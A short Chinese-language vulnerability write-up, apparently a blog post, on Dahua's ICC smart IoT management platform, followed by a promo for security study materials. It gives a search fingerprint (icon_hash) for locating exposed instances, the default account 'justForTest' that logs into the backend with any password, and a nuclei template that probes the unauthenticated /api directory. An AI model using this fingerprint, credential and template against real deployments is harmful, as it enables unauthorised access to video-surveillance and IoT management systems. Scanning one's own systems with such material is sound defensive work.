0x01 漏洞介绍
浙江大华技术股份有限公司智能物联综合管理平台是一款基于物联网技术的综合性管理平台,旨在为企业和用户提供智能化、便捷化的物联网解决方案。该平台整合了大华技术在视频监控、数据采集、数据分析等方面的核心技术,实现了对各类物联网设备的统一管理和控制,提高了企业的运营效率和管理水平。该漏洞因为对敏感目录没有做访问限制,以及没有删除默认用户。
0x02 影响版本
浙江大华技术股份有限公司智能物联综合管理平台(ICC)
0x03 语法特征
icon_hash="-1935899595"
0x04 漏洞复现
页面
POC
url+/api
默认用户即可登录后台(密码随意)
justForTest/xxxxx
nuclei:
id: ICC-API-INFO-WEAK
info:
name: ICC-API-INFO-WEAK
author: ICC-API-INFO-WEAK
severity: medium
tags: icon_hash="-1935899595"
http:
- raw:
- |
GET /api/ HTTP/2
Host: {{Hostname}}
Cookie: name=value
matchers-condition: and
matchers:
- type: word
words:
- "文档目录"
- type: status
status:
- 200
免费领取安全学习资料包!(私聊进群一起学习,共同进步)![](https://img-blog.csdnimg.cn/59b7ac25d9954194a807226fc79ea07c.png)
渗透工具
技术文档、书籍
面试题
帮助你在面试中脱颖而出
视频
基础到进阶
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
应急响应笔记
学习路线